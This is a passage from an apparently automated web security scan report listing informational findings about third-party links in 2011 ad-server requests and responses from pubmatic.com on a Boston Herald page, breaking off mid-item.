Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1862
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1191711468=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...
<'+'noscript><a href="http://a.collective-media.net/jump/iblocal.revinet.bostonherald/audience;sz=300x250;ord=%23PCACHEBUSTER?" target="_blank"><img src="http://a.collective-media.net/ad/iblocal.revinet.bostonherald/audience;sz=300x250;ord=%23PCACHEBUSTER?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

17.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.8495062424335629&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1861
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_22455_875178760=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...
<'+'noscript><a href="http://a.collective-media.net/jump/iblocal.revinet.bostonherald/audience;sz=728x90;ord=%23PCACHEBUSTER?" target="_blank"><img src="http://a.collective-media.net/ad/iblocal.revinet.bostonherald/audience;sz=728x90;ord=%23PCACHEBUSTER?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

17.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A42&ranreq=0.34033529623411596&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71499648&rk1=83196381&rk2=1316239662.087&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:16 GMT
Content-Length: 1833
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:16 GMT; path=/
Set-Cookie: _curtime=1316221576; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:16:16 GMT; path=/
Set-Cookie: pubfreq_27331_23103_438841735=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:16 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=3B562A1A-AFF3-45E2-AA47-9F7ABA49731B&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71499648%26rk1%3D83196381%26rk2%3D1316239662.087%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A3&ranreq=0.39337378134950995&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=67673251&rk1=17154153&rk2=1316239503.607&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:38 GMT
Content-Length: 1851
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:37 GMT; path=/
Set-Cookie: _curtime=1316221418; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:13:38 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1229426233=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:38 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=C3838ED1-0264-4F92-BB08-800A088CFCDE&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D67673251%26rk1%3D17154153%26rk2%3D1316239503.607%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A3&ranreq=0.44578465982340276&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:28:25 GMT
Content-Length: 1971
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:28:25 GMT; path=/
Set-Cookie: _curtime=1316222905; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:38:25 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:28:25 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7155&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=91B9DC4D-F787-4FC6-80AD-3F4C1035FE49&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

17.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1836
Date: Sat, 17 Sep 2011 01:20:28 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:20:28 GMT; path=/
Set-Cookie: _curtime=1316222428; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:30:28 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=5543638C-62F9-4D6B-AF31-4C36185407EC&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71897565%26rk1%3D2053665%26rk2%3D1316239421.077%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A6%3A27&ranreq=0.43855415820144117&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38185087&rk1=62469548&rk2=1316239584.729&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PMDTSHR=cat:; DPPIX_ON=YES; SYNCUPPIX_ON=YES; USCC=ONE; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:01 GMT
Content-Length: 1766
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:01 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1623588958=973-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:01 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...
<'+'noscript><a href="http://a1.interclick.com/getInPageTarget.aspx?a=53&b=13578&cid=1242931236281"><img src="http://a1.interclick.com/getInPageImage.aspx?a=53&b=13578&cid=1242931236281" border="0"></a>
...[SNIP]...

17.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A35&ranreq=0.421427555847913&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38484872&rk1=72091245&rk2=1316239534.984&pt=0
